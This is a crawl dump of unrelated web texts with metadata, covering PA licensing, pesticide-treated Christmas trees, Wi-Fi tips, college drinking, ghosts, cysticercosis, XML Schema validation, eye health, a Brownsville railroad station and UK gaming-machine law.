bill. In his veto message, the governor stated that “[b]y removing the state’s requirement that physician assistants maintain national certification as a condition of renewing their license, the interests of West Virginia patients are not being protected as strongly as they should be.” To find out more about how states are dealing with PA scope of practice issues please visit the Legislative Database page.
<urn:uuid:cef67173-3d0b-4534-81b6-759f30c42514>
CC-MAIN-2022-33
https://scopeofpracticepolicy.org/physician-assistants/physician-assistants-collaboration/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572870.85/warc/CC-MAIN-20220817062258-20220817092258-00665.warc.gz
en
0.958956
488
1.890625
2
John A. Keslick, Jr. treeman at pond.com Sat Nov 16 07:43:34 EST 1996 I am not against Christmas, nor am I against Christmas Trees. Likewise I am not against Christmas Tree Growers growing trees for the sole purpose of cutting at Christmas. I am not against people who celebrate Christmas in different ways. Nevertheless, what makes me very displeased is the continued cutting of trees for NEW SHOPPING MALLS and FOR MORE ROADS. I have met many families in the last year that agree that we need not sacrifice children, for an artificial lawn by the addition of lawn care chemicals. How many environmentalists know that when they go buy a Christmas Tree that at least 90% of the time they are buying a tree laced with chemical pesticides (foliar of systemic)? That is right, Christmas tree growers(most of them)know nothing about tree anatomy. Yet when we buy one of these trees, we are supporting the nitrogen fertilizer industry and the chemical pesticide industry. Many people will not allow chemical use on their property and then turn around and bring a chemically treated tree into the household. No research is available to show what results when lighting changes the tree's temperature and such. Enough of that, do not believe because I said, call up and ask them for yourself. Explain to them that your children are sensitive to pesticides and if you find some that are not treated, consider yourself fortunate. I have been studying tree anatomy and tree biology for many years. I know why some of the pest and fungus signs exist. Change will come about by money factors. Lets save the water. Be wise and buy pesticide free trees this Christmas. HAPPY HOLIDAYS. John A. Keslick Jr. West Chester, Paoli, Wallingford John A. Keslick Jr. If you are not OUTRAGED you're not Tree Anatomist & Tree Biologist paying attention. Phone: 610-696-5353 Support ORGANIC FARMERS. organic tree treatment web site: http://www.ccil.org/~treeman/ OR http://www.ccil.org/~kenm/env/ More information about the Plantbio
<urn:uuid:a3e78631-c708-42fa-90ad-ad4a49fd1bdc>
CC-MAIN-2017-04
http://www.bio.net/bionet/mm/plantbio/1996-November/012765.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00436-ip-10-171-10-70.ec2.internal.warc.gz
en
0.911673
498
1.601563
2
- The first step would be to power cycle your router by unplugging it from the power for 30 seconds then plugging it back in. - The second step would be to adjust your antennas. Do this by moving one of the antennas in a 90 degree angle. By ensuring the antennas are not parallel to each other may be the solution to reaching the problem area. This step however can be skipped if you have a router with built in antennas. Learn more about how you can boost your wifi signal here.
<urn:uuid:050a289f-bef5-428d-ac61-af19b4ac3c28>
CC-MAIN-2022-33
https://wightman.ca/support/internet/faq/wifi-faq/how-can-i-improve-my-wi-fi
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573163.7/warc/CC-MAIN-20220818033705-20220818063705-00070.warc.gz
en
0.939453
104
2.0625
2
Mastering Successful Work Mastering Successful Work by Tarthang Tulku, was created to help readers live cheerfully, work with good results, and profit from knowledge in any circumstance. Offering clear, powerful guidance on how to make work into a path of transformation and dynamic realization, Mastering Successful Work sets forth principles and practices that apply to almost everyone and to virtually every discipline. For those who have been successful, it offers opportunities to discover a quality in work that gives a new sense of meaning. - Part One sets forth central themes of knowledge, time, and awareness - Part Two introduces structures for accomplishment: paying attention, taking responsibility, discipline, communication, and sharing knowledge. - Part Three presents exercises for transforming attitudes and approaches: recognizing and overcoming negative patterns. - Part Four includes more advanced supplemental exercises, leading up to tools for transformation, and concluding with a list of good business practices. Together, the motivation chapters and the exercises have a structure and progression that can be followed by individuals working on their own or incorporated into Skillful Means seminars and programs. More than 80 exercises that can be done on-the-job are included.
<urn:uuid:3494bec5-01c5-47a3-88d7-eff6bcc8d9ad>
CC-MAIN-2022-33
https://dharmapublishing.com/collections/books-exploring-the-modern-mind/products/mastering-successful-work
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570879.37/warc/CC-MAIN-20220809003642-20220809033642-00673.warc.gz
en
0.933524
256
1.632813
2
Have you, by chance, read or looked into Tom Campbell's book, "My Big Toe"? He has a wonderful theory regarding that very question. He posits that everything is "consciousness", and our individual consciousness is just a part of the whole in order to interact with itself with the primary goal of lowering our entropy. It's a really great read and really opens ones mind to the possibilities. No but I will look into it! This is my current view on the conscious universe theory. I'm making an assumption here as I haven't looked into his specific theory yet, which is naughty of me, but.... ....is it the same as the popular belief now that the universe is a thinking entity, that re-orders itself to influence your fate? At face value, this theory doesn't sit well with me. Perhaps it did once, when I was much more spiritual in my approach, but that didn't really give me any useful answers, only more questions. Questions like this... As I see it, consciousness is defined as an identity - a collection of experiences, beliefs, attitudes, and interpretation of sensory input. Anything that can freely receive and process data then willfully act on it is conscious, right? That includes humans and animals, and one day computers. So at this level of understanding, it seems like a big jump for the entire universe - a vast collection of independent inanimate bodies and conscious beings - to be able to behave willfully as one identity. It feels to me like invoking the idea of an omnipotent god, and then saying (s)he's in all of us. I realize my logic is reductionist but then again that works pretty well for us in many existing scientific models. If I were to argue pro this theory, I'd say that kidney cells don't know they're part of a kidney, so why should I know I'm part of a super-mega-conscious-being at least 14 billion years old? But I still have to ask, where is the giant kidney? How can we say it exists.... how did that leap come about? I do accept that there is MUCH we don't know about the universe... there may be unidentified forces, many more dimensions, and exotic stuff we haven't found yet. So I would not say with 100% certainty that the universe isn't conscious, that would be foolish. But I do believe that this theory is somewhat mystical and that the current data shows no mechanism for it, and I find it unscientific (my core values) to take that leap of faith. But that's just me. Maybe that's what Tom Campbell's book is about? If you want to elaborate on the mechanism I'm all ears...
<urn:uuid:c6108739-ff5c-4c08-bd14-b5da571cbaab>
CC-MAIN-2017-04
http://www.world-of-lucid-dreaming.com/forum/viewtopic.php?p=4845
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00271-ip-10-171-10-70.ec2.internal.warc.gz
en
0.974851
564
1.804688
2
In college drinking culture, moderation does not exist. Approximately 20 percent of college students meet the criteria for alcohol use disorder. Additionally, a 2014 survey found that two-thirds of the 60 percent of college students who consumed alcohol in the past month engaged in binge drinking, a behavior that brings blood alcohol concentration to more than .08 g/dL. Students here are eager to boast about the “work hard, play hard” lifestyle that is fundamental to the Penn experience. They join countless clubs to build their resumes, crank out research papers at Van Pelt and ace calculus midterms. But the weekends start on Thursday along with students’ destructive drinking habits. The consequences of this behavior are no secret. Researchers estimate that 1,825 college students die per year from alcohol related injuries, 696,000 students are assaulted by another who has been drinking and 97,000 experience date rape or alcohol-related sexual assault. We have seen these statistics in action through the recent death of Pennsylvania State University student Tim Piazza and the Stanford University sexual assault case. Some of the Penn administration’s attempts to reduce the negative effects of binge drinking have been effective. For example, the University’s medical amnesty policy allows students to seek medical attention while under the influence without facing disciplinary repercussions, while MERT provides urgent care to those who have been affected by alcohol poisoning among other issues. Nevertheless, the administration needs to pay more attention to alcohol abuse on campus. Additionally, we as students must do our part to stop fostering an excessive drinking culture. The University recently convened a task force to help combat the dangers of excessive drinking, which has been the subject of much scrutiny. However, the task force has inadequately addressed this issue and only caters to the wealthy by raising the cost of partying. Additionally, aside from Quaker Peer Recovery, there are no groups on campus specifically designed to help those struggling with alcoholism or related issues. Administrators never fail to point students seeking help to Counseling and Psychological Services; however, they often must wait months for appointments. What the University fails to recognize is that, like so many of the issues students face, binge drinking demands immediate attention. College is stressful. Students are bombarded with exams, essays and readings that they must juggle with other responsibilities such as jobs and extracurriculars. The stress that is induced by these activities can often lead to heavy drinking. Alcohol consumption releases endorphins that stimulate an enhanced state of being. It can make people experience pleasurable sensations of relaxation and euphoria, and the extreme amount of pressure college students face often motivates them to binge drink as a means for recovery. This is not just a Penn problem; binge drinking plagues numerous American universities. But what makes Penn different is its glorified “work hard, play hard” mentality. In 2016, Business Insider awarded Penn the number one spot in their list of rankings entitled WORK HARD, PLAY HARD: The 30 most intense colleges in America; in 2014, Penn was named Playboy’s number one party school; and in the book “Students' Guide to Colleges: The Definitive Guide to America's Top 100 Schools Written by the Real Experts--The Students Who Attend Them,” some of the five most common terms students used to describe Penn included “work hard, play hard,” “high achieving” and “fun-as-hell.” Social skills and academic prowess hold equal importance. But there is a fine line between possessing these skills and taking pride in Penn’s reputation as the “social Ivy” where the ability to go out, get blackout drunk and wake up the next morning to do homework is applauded. The positive reinforcement of these mantras by students fuels the unhealthy behavior that runs rampant at Penn. On many occasions, students have called on the University to implement effective policie and form groups that will mitigate the consequences of excessive drinking. Undoubtedly, it is time for the administration to listen. Students should also refocus their attitudes by thinking differently about how rewarding binge drinking promotes a negative campus culture. “Work hard, play hard,” when taken to its extreme, is not something to brag about. ISABELLA SIMONETTI is a College freshman from New York. Her email address is firstname.lastname@example.org. “Simonetti Says So” usually appears every other Tuesday.
<urn:uuid:6a802153-4a63-47e1-8174-1393e7ca51f1>
CC-MAIN-2022-33
https://www.thedp.com/article/2017/10/isabella-simonetti-our-responsibility-to-a-dangerous-drinking-culture
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571758.42/warc/CC-MAIN-20220812200804-20220812230804-00675.warc.gz
en
0.953782
917
2.296875
2
~~ What Is A GHOST ~~ What is a Ghost? The traditional view of ghosts is that they are the spirits of dead people that for some reason are "stuck" between this plane of existence and the next, often as a result of some tragedy or trauma. A ghosts is a person or animal that died recently and doesn't realize that it is dead, and needs guidance to the other side. A polergeist (German for "Knocking Spirit") is a person or animal that died and refuses to go away, while causing alot of trouble for anyone and The Signs of a Haunted House: * Unexplained noises - footsteps; knocks, banging, rapping; scratching sounds; sounds of something being dropped. * Doors, cabinets and cupboards opening and closing - most often, these phenomena are not seen directly. The experiencer either hears the distinct sounds of the doors opening and closing (homeowners get to know quite well the distinctive sounds their houses make) or the experiencer will return to a room to find a door open or closed when they are certain that it was left in the opposite position. Sometimes furniture, like kitchen chairs, are perceived to have been moved. Very rarely will the experiencer actually witness the phenomenon taking place. * Lights turning off and on - likewise, these events are seldom seen actually occurring, but the lights are switched on or off when the experiencer knows they were not left that way. This can also happen with TVs, radios and other electrically powered items. * Items disappearing and reappearing-- say, your set of car keys - which you believe you placed in a spot you routinely place them. But they're gone and you look high and low for them with no success. Some time later, the keys are found - in exactly the place you normally put them. It's as if the object was borrowed by someone or something for a short time, then returned. Sometimes they are not returned for days or even weeks, but when they are, it's in an obvious place that could not have been missed by even a casual search. * Unexplained shadows - the sighting of fleeting shapes and shadows, usually seen out of the corner of the eye. * Strange animal behavior - a dog, cat or other pet behaves strangely. Dogs may bark at something unseen, cower without apparent reason or refuse to enter a room they normally do. Cats may seem to be "watching" something cross a room. Animals have sharper senses than humans, and many researchers think their psychic abilities might be more finely tuned also. * Feelings of being watched - this is not an uncommon feeling and can be attributed to many things, but it could have a paranormal source if the feeling consistently occurs in a particular part of the house at a * Feelings of being touched * Cries and whispers * Cold or hot spots - cold spots are classic haunting symptoms, but any instance of a noticeable variance in temperature without a discernable cause could be evidence. * Unexplained smells - the distinct fragrance of a perfume or cologne that you do not have in your house. This phenomenon comes and goes without any apparent cause and may accompany other phenomena, such as shadows, voices or psychokinetic phenomena. Foul odors can happen in the same way. Unbelievable!!!! But it's true
<urn:uuid:7d0817e2-ac18-4a9d-b870-b3c98a69cea8>
CC-MAIN-2016-44
http://www.unp.me/f8/what-is-a-ghost-13299/
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719155.26/warc/CC-MAIN-20161020183839-00333-ip-10-171-6-4.ec2.internal.warc.gz
en
0.957987
736
2.734375
3
Volume 5 Supplement 1 Can we eradicate Cysticercosis? © Franchard et al; licensee BioMed Central Ltd. 2011 Published: 10 January 2011 Man is the only known definitive host of the tapeworm Taenia solium and becomes a carrier by eating undercooked pork contaminated with “Cysticercus cellulosae” (cysticerci). Pigs act as intermediate host and acquire cysticercosis by ingestion of eggs or proglottids from human feces, which develop into cysticerci within tissue mostly without causing clinical symptoms in the host. Cysticercosis occurs in man in a context of “Fecal peril” by ingestion of egg-contaminated soil, water or vegetation or by auto-infestation. In theory separation of swine from humans, good cooking practice and hygiene should lead straightforwardly to the eradication of the disease! However cysticercosis is still a major public health problem in endemic regions with more than 50 million infected people and is now a re-emerging disease in industrialized countries due to human migration. It is also the second cause of seizure in tropical countries. So what are the pitfalls in cysticercosis control and what can we do? Cysticercosis affects free roaming pigs with access to sites contaminated with human feces. Development of good rearing practice guides will be of major impact. Only few tools are available for ante-mortem diagnosis of porcine cysticercosis and tongue palpation remains the most commonly used tool. Therefore, the development of a rapid diagnostic test, usable in villages, to test cattle will be the second weapon. However, this will need recombinant antigens. Diagnostic obstacles also affect human patients presenting with seizures. Scans and biological tests are not readily available leading to the repeated treatment of patients. New target proteins are thus needed to develop these tests. With the sequencing of T. solium genome which will allow identification and production of recombinant protein a new step in the right direction was made. Now a large advocacy to raise funds in order to get this strategy on track is needed. Here we summarize the current state of the disease, practical issues linked to the organization of a feasible control system in developing countries and new data available all over the world and in particular in Madagascar to sustain this advocacy. This article is published under license to BioMed Central Ltd. This is an open access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
<urn:uuid:0ea04cec-eca0-47d5-a020-f68ac0d1fb74>
CC-MAIN-2017-04
http://bmcproc.biomedcentral.com/articles/10.1186/1753-6561-5-S1-P56
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.920192
546
2.90625
3
Teach essential vocabulary in ten minutes a day with this cluster approach to help fourth grade students learn many semantically related words at once! This resource provides opportunities for students to explore and expand vocabularies, increase reading comprehension, and improve writing composition. Standards for College and Career Readiness are supported by assisting students' understanding of word relationships and nuances in word meanings. Lessons provided are simple and easy-to-use, activity results can be used for formative assessment, and digital resources include lessons and teacher resources. Shell Education - SEP51303 Quantity Available for Web Orders: 51 (Call 314-843-2227 to see if this item is available in the store in St. Louis.) Grade: Grade 4 Age: 8-10 years Hubbard Company - WAR91018
<urn:uuid:1518bf06-d65f-498e-9a84-d14d5e2f0b78>
CC-MAIN-2022-33
https://www.the-teachers-lounge.com/product/vocabulary-ladders-understanding-word-nuances-level-4/shell-education/sep51303/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571989.67/warc/CC-MAIN-20220813232744-20220814022744-00475.warc.gz
en
0.879061
174
3.703125
4
One thing I've done a few times for banking clients is to build systems for quality control and release of large sets of XML Schemas. Just as you check code before a release - compile it, test it, run style checks over it - you also need to do the same kind of checking for XML Schemas. You test that they are valid Schemas, you regression test them using XML examples, you run style checks over them, and perhaps also generate code or other artefacts from them. What you do, whether it's for Java/C# or whether it's for XML Schemas, is to check some kind of IT resource using some set of rules. You can call it validation, but that's just a long word for checking. If you are checking XML documents using a set of structural/formatting rules defined by an XML Schema, you call it validation. People are used to validators that check XML and log errors, just as they are used to compilers that check code and log errors. It's very familiar, it's a common model for how such tools work. However, I've found it to be a problem when I'm building XML Schema checking frameworks. Why? One reason is that, with checks like style checks, today's disallowed style is tomorrow's allowed style, and vice-versa. As organisations develop their XML Schemas over time, they adjust their style checks. Type extension or substitution groups might be banned today, they might be allowed tomorrow. To build a flexible checking framework, you want to be able to change quickly the interpretation or the severity of a particular feature, of a particular style. This is why I found it best to break things up into the three stages - "Interrogate, Report, Act". - Understand the resource(s) you are checking, the structure, the formatting, the style, whatever you need to understand. Don't make any judgements at this stage - the judgements are the things you need to be able to change, so you don't want to embed them into the interrogations. - Put the results of your interrogations into a common reporting format. If you have XML Schema validation results, Schematron validation results, ad-hoc XQuery/XSLT validation results, and Schema compiler validation results (as an example), they won't all be in the same format. Some might be XML, others will be text. Get them into a common format for reporting. That's important so that you can slice and dice your interrogation results, and display them in a consistent way that gives developers, testers and managers the most appropriate summaries. It's also important so that you can easily add new results without impact on your presentation and drill-down code. - Once all interrogation results are in a common reporting format, make your judgements and perform any consequent actions. Throw exceptions, log errors or warnings, or choose to ignore particular results if that is what the system's users have configured (there can be good reasons for ignoring particular test results for particular resources - but for sanity, make sure you capture the reasons for doing so in the configuration information). This is the layering of concerns that has worked well for me. I've used it for XML and XML Schemas, but it is a general approach that can be applied to any kind of validation or checking process. By not making too early a judgement of thumbs up or thumbs down, you will have a more flexible checking framework that is more easily configurable and extensible than it would otherwise have been.
<urn:uuid:472f044d-83a7-48e0-93e3-060b0af42830>
CC-MAIN-2017-04
http://kontrawize.blogs.com/kontrawize/2010/06/interrogate-report-act-a-layered-approach-to-validation-checking.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00566-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930442
735
1.835938
2
Vision Issues to Monitor in Your 40s, 50s, 60s, and Beyond With each passing year, we gain more memories and more wisdom. (We hope!) But as we grow older, our bodies change too, including our eyes and vision. This process is natural, but it’s important to stay aware of age-related vision changes to keep our sight and health on track. If you’ve found yourself squinting at print or holding a book at arm’s length lately, you’re not alone. Difficulty seeing clearly for reading and close work is among the most common problems for those between the ages of 41 to 60.1 40 to 60 Starting in the early to mid-40s, most of us may experience presbyopia, a condition in which the lens in the eye becomes less flexible, making it more difficult to focus at close distances.1 Fortunately, you have many options for dealing with presbyopia. Reading glasses, for example, can be a simple answer. As you continue to age through your 50s, presbyopia typically becomes more advanced. But these changes often stop around age 60.1 Also, if you’re over 40, you’re more likely to develop eye health and vision problems if you have any of the following risk factors:1 - A family history of glaucoma (increased pressure in the eye can lead to vision loss) or age-related macular degeneration (loss of central vision) - A visually demanding job or eye-hazardous work In addition, medications prescribed for common health conditions such as high cholesterol, thyroid conditions, anxiety or depression, and arthritis can increase your risk for vision problems.1 Many medications, even antihistamines, can adversely affect your vision.1 If you’re over 60 As you reach your 60s and beyond, it’s important to watch for warning signs of age-related eye problems that could cause vision loss. Many eye diseases have no early symptoms, but early detection through regular eye examinations and treatment can help slow or stop their progression. Here are some of the problems you and your eye doctor should watch for:2 - Age-related macular degeneration (AMD) – an eye disease that causes loss of central vision - Diabetic retinopathy – a condition that occurs in long-term diabetes and may cause vision loss - Retinal detachment – tearing or separation of the retina from the underlying tissue2 - Cataracts – clouding of the lens of the eye and a cause of vision loss - Glaucoma – damage to the optic nerve and a cause of blindness - Dry eye – lack of eye lubrication Issues such as needing more light, difficulty reading, problems with glare, changes in color perception, and reduced tear production2 are signs that you should schedule an eye exam. Look forward to the years ahead Growing older brings changes, but it also brings the opportunity to enjoy all the people and experiences we’ve gathered over our lives. To help ensure optimal eye health, take care of your eyes today and in the years ahead with an annual eye exam. Because no matter what your age, when you see and feel your best, you’ll have the time of your life. 1American Optometric Association, “Adult Vision: 41 to 60 Years of Age,” 2010. 2American Optometric Association, “Adult Vision: Over 60 Years of Age,” 2010. Information in this article is provided for informational purposes only and does not constitute medical or other professional advice. BCBSRI does not recommend or endorse specific services, providers, procedures, advice, or other information provided in this article.
<urn:uuid:cc22b457-f08e-46e8-8259-86f8a2bdb072>
CC-MAIN-2022-33
https://www.rhodeahead.com/health/vision-issues-monitor-your-40s-50s-60s-and-beyond
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573540.20/warc/CC-MAIN-20220819005802-20220819035802-00472.warc.gz
en
0.93747
776
2.390625
2
Southern Pacific Railroad Train Station, Brownsville Texas The coming of the Southern Pacific Railroad to Brownsville on November 14, 1927, before the station was built, was perhaps the most significant event associated with the site. The Rio Grande Valley had enjoyed a spectacular growth from 1900 to 1930. This growth can be attributed to two factors—the introduction of irrigation in 1898, and the coming of the railroad in 1905. The Missouri Pacific Railroad had entered this area in 1905, and on May 11, 1925, the Interstate Commerce Commission granted permission for the Southern Pacific to acquire the San Antonio and Aransas Pass Railway, which held a charter into the Valley. The completion of the Southern Pacific to its southernmost point in Brownsville was a major event. The driving of the golden spike was scheduled to coincide with the first annual South Texas Chamber of Commerce Convention. The City of Brownsville staged a celebration when November 14 was declared Southern Pacific Day. In an issue of the Brownsville Herald carrying notices dated Nov. 1 (from Ankora, Turkey, on the Mustapha Kamal Pasha; from Belgrade, Jugoslavia, concerning suspension of telegraph and telephone censorship which had been instigated as the result of a Carolist plot; and a possible visit to Brownsville of Ruth Elder, American aviatrix), there appears Mayor A. B. Cole's "PROCLAMATION" which stated: “On November 14th- and 15th., the City of Brownsville will stage in connection with- the South- Texas Chamber of Commerce Convention a large celebration on the coming of the Southern Pacific Railroad to this city. We expect to have with us thousands of visitors, many of whom will be here for the first time. We are particularly anxious that Brownsville present a neat and attractive appearance and I, as Mayor of Brownsville, urge that property owners make special effort to clean up his or her premises, cutting all weeds, mowing lawns, etc. The general good appearance of our city will leave a lasting impression on our visitors.” The crowd assembled in Washington Park, near the station, was the largest the town had ever seen- The Southern Pacific sent a duplicate of the Sunset Limited from Houston carrying H. M. Lull, Vice President, G. S. Waide, General Manager, and W. C. McConnick, General Passenger Agent. They also sent the special track-laying machine which made possible the rapid extension of the line from Harlingen to Brownsville. Although the station was not completed until later, the first scheduled passenger train entered Brownsville on November 10, 1927. (Brownsville Herald, November 1-15, 1927.)
<urn:uuid:84379e67-e0e9-4f06-a48b-216508b9f746>
CC-MAIN-2022-33
http://www.historic-structures.com/tx/brownsville/railroad_station.php
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572215.27/warc/CC-MAIN-20220815235954-20220816025954-00672.warc.gz
en
0.962985
548
2.671875
3
Part 10: Gaming Machines 574.Part 10 contains the main provisions of the Act on gaming machines. It sets out a definition of “gaming machine” together with the offences relevant to illegal use or manufacture of a gaming machine. Parts 5 and 8 of the Act deal with certain authorisations and entitlements to use gaming machines that arise from operating or premises licences respectively. This Part provides general provisions which apply to the use of any gaming machine, and includes regulation-making powers for the Secretary of State to set categories of machine and rules on use. 575.Manufacture, supply, maintenance, repair, installation and adaptation of a gaming machine are all regulated activities under this Part. 576.This Part applies to any gaming machine situated in Great Britain, or anything done in Great Britain in relation to a gaming machine, wherever that machine is situated (section 251). For example, a gaming machine manufactured in Great Britain, for export to another country, will be covered by the provisions in Part 10. Accordingly, a gaming machine technical operating licence under Part 5 of the Act will be available to manufacturers and suppliers who wish to cater for the overseas market. Such machines need not comply with the categorisation regulations under section 236 if the machines are for export. Machines supplied for use in Great Britain will need to comply with the requirements of Part 10, even if manufactured abroad. Section 235: Gaming machine 577.This section provides a definition of a gaming machine for the Act. It is significantly broader than the definition of gaming machine in section 26 of the Gaming Act 1968, which the Act repeals. The new definition accommodates developments in technology which have taken place since the 1968 Act. It also covers a wide range of gambling activities which can take place on a machine, and includes betting on virtual events. 578.Subsection (1) defines a gaming machine as a machine that is designed or adapted for use by people to gamble (whether or not it can be used for other purposes). This is a wide definition. Subsection (3)(b) contains further detail about how the words “designed or adapted” are to be interpreted, particularly in relation to a computer. 579.Subsection (2) then sets out a number of exceptions to subsection (1) which ensure that the gaming machine definition does not capture certain specified types of machine. 580.The definition at subsection (1) does not depend on any concept of players depositing payments into the machine, or on the gambling activity being generated from within the machine itself (as opposed to being transmitted to the machine from other equipment). Nor is it restricted solely to gaming. To the extent that these were requirements under the 1968 Act, they are no longer part of the new definition. 581.The exclusions at subsection (2) provide that the following are not gaming machines: A domestic or dual-use computer which can be used for participating in remote gambling. The Secretary of State will prescribe the meaning of “domestic computer” and “dual-use computer” in regulations. The purpose of this exception is to exempt internet terminals and home computer equipment, which are not dedicated or specifically configured for gambling activities, from the definition of gaming machine. The mere fact that a home computer can be used to access gambling facilities should not render the computer a gaming machine. However, someone offering the public access to the internet, via terminals, and configuring them to encourage gambling, is making a gaming machine available for use (unless any other exception applies, such as betting on real events). The regulations to be made under this power will set out the relevant criteria for determining whether equipment is a domestic or dual use computer, and can refer to matters such as the location of the computer, the software installed on the computer, and the circumstances in which the computer is used (subsections (2)(a), (3)(f) and (4)); A telephone or other communications device that can be used for remote gambling (other than a computer). The fact that, with modern technology, a telephone or interactive television can be used to participate in gambling will not render the equipment a gaming machine (subsection (2)(b)). This exception does not apply to computers; A machine which is designed or adapted for betting only on future real events. This exemption is designed to prevent equipment, such as automated betting terminals, through which people place bets on real, not virtual, events, from being counted as gaming machines. The event must be a future event at the time the machine is used, meaning that betting on pre-recorded activities, where the result is already known, is not exempt. The exempt equipment is not unregulated. Making it available as part of a business will be providing facilities for betting, and will require the relevant operating licences under the Act. However, in regulatory terms, these machines are not to be treated as gaming machines (subsection (2)(c)). A machine upon which someone enters a lottery. Provided that the machine does not determine the result of the lottery, or announces it only after a specified period, then such a machine is not a gaming machine. This means that if a machine only dispenses lottery tickets (for a draw that takes place completely independent of the machine), or vends lottery paper scratchcards, then the machine is outsides the definition of a gaming machine. If the machine announces the results of the lottery, as well as selling tickets to it, then the machine will not be a gaming machine provided a prescribed interval has elapsed between the sale of the ticket and the announcement of the result. The Secretary of State will determine the duration of the period by order. In no circumstances can the machine determine the result of the lottery (subsection (2)(d)). A machine for playing bingo which is used by the holder of a bingo operating licence, in accordance with conditions attached by the Commission. This is designed to exempt what is known as “mechanised cash bingo equipment which is used for playing real bingo games, but whose degree of computerisation or mechanisation means that it would otherwise be caught by the definition of gaming machine. The need for it to comply with Commission conditions ensures that the exemption is construed narrowly and not extended to any machine on which a virtual bingo game could be played (subsection (2)(e)); A machine for playing bingo prize gaming which is used by the holder of a gaming machine general operating licence (for an adult gaming centre or a family entertainment centre), in accordance with conditions attached to those licences by the Commission. This is designed to exempt equipment used for playing real prize bingo, in accordance with the terms of Part 13 of the Act. The need for it to comply with Commission conditions ensures that the exemption is construed narrowly and not extended to any machine on which a virtual bingo game could be played (subsection (2)(f)); A machine for playing bingo prize gaming which is used by an unlicensed family entertainment centre or pursuant to a prize gaming permit, in accordance with any Commission code of practice. This exemption is similar to that at subsection (2)(g), but applies to different types of operator who have prize gaming rights under Part 13 (subsection (2)(g)); A machine which is used for playing manual games of chance. This is a machine which: is controlled or operated by someone employed to do so (e.g. a croupier spinning a roulette wheel); or is used in connection with a real game of chance which is controlled or operated by an individual (e.g. a computer terminal for staking on the outcome of a roulette wheel that is spun by a croupier) (subsection (2)(h)). In both these instances the equipment could be construed as a gaming machine under the broad definition, but the fact that it is operated as part of a real game of chance means that it is not to be regulated under the gaming machine provisions. Such equipment and activities will be regulated under other parts of the Act. A machine which is used for playing automated games of chance in a casino. This is equipment used for playing a real game of chance, pursuant to a casino operating licence, but which has no human involvement from the organisers of the casino game, and which is not linked to a game which does have such human involvement. For example, apparatus such as a roulette wheel which is completely mechanised, and works without the need for any croupier to rotate the wheel, spin the ball or accept stakes. This equipment is not a gaming machine provided it is used in accordance with Commission licence conditions. Section 174(6) contains further provisions in relation to this equipment in casinos. 582.These various exemptions prevent the broad definition of gaming machine from capturing equipment unintentionally. The definition in subsection (1) is intended to cover a gaming machine that is used for taking part in virtual gaming, virtual betting or a virtual lottery (where the draw is part of the activity determined by the machine). 583.Subsection (3) provides clarification about the characteristics of a gaming machine. Reference to part of a gaming machine includes computer software to be used in a gaming machine, but does not include a component of a gaming machine which does not influence the outcome of the gambling (subsection (3)(c)). This means that where a gaming machine technical operating licence is required for the manufacture, installation etc. of gaming machines, computer software intended for use in the machine is included within the licensing requirement. However, the plywood from which the machine is constructed is not. References to installing part of a gaming machine include installing computer software (subsection (3)(d)). This is required because machines can be configured or changed by the downloading of gambling software, without any need to physically interfere with the machine. 584.Subsection (5) allows the Secretary of State to make regulations concerning the sub-division of apparatus into individual gaming machines. It is no longer the case that a gaming machine will take the form of a stand-alone machine in the form of a traditional “fruit-machine”. A single computer can be linked to a number of player positions and offer each player the experience of playing a gaming machine, although the apparatus forms one large whole. To tackle the possibility of evasion of the Act’s regulation for gaming machines, this power allows rules to be made for calculating when a single piece of apparatus counts as more than one machine, and, in particular, can focus on the number of player positions available. These regulations will supplement other parts of the Act, where numerical limits are placed on the entitlements to make gaming machines available for use. Section 236: Gaming machines: Categories A to D 585.Gaming machines will be divided into categories, with different entitlements set out in the Act to use the various categories. This section requires the Secretary of State to define, in regulations, four classes of gaming machine, to be known as categories A, B, C and D. Category B may also be sub-divided into further sub-categories, and these regulations may identify to which sub-category of B machine an entitlement relates (subsections (1) and (2)). 586.The categorisation will refer to the particular facilities for gambling which are offered on the machine. In particular, under subsection (4), the regulations can specify: the maximum amounts that can be paid to use the machine; the value or nature of the prize delivered as a result of its use; the nature of the gambling for which the prize is used; or the types of premises on which it can be used. 587.These matters can be combined so that, for example, one category of machine could have different maximum use charges dependent on the nature of the prize offered by the machine. 588.Details of the proposed A to D categorisation of gaming machines is set out in the Regulatory Impact Assessment published alongside the Act. The intention is that Category D will have the lowest levels of charge and prizes, and that these will increase in value, up to Category A, which will be a machine with no limits as to charges and prizes. 589.Part 8 of the Act contains the principal commercial entitlements for different types of licensed gambling premises to use different categories of machines. Different permissions are also available under Part 12 of the Act, for clubs, miners’ welfare institutes, alcohol licensed premises and travelling fairs, and, also, pursuant to this Part, for family entertainment centres. Sections 237 to 239: Other definitions 590.These sections set out definitions for an adult gaming centre, a family entertainment centre, (including a licensed family entertainment centre), and a “prize” in relation to a gaming machine. Sections 240 & 241: Use and supply of machines 591.The Secretary of State can make regulations about the way in which gaming machines can operate. It will be an offence to make a gaming machine available for use if the machine does not comply with such regulations. 592.Under subsection (2), the regulations may provide, in particular, for rules about: The method by which payment may be made for use of machine (i.e. whether coins, banknotes, smartcards, tokens or other methods can be used). It is a separate offence, under this Part, to supply, install or make a machine available which can be paid for by a credit card; The nature of, and arrangements, for receiving or claiming prizes; The rollover of stakes or prizes (i.e. the carry over of amounts paid or won to a subsequent use of the machine); The proportion of stakes or sums paid for use which must be returned as prizes; The display of information on or around the machine 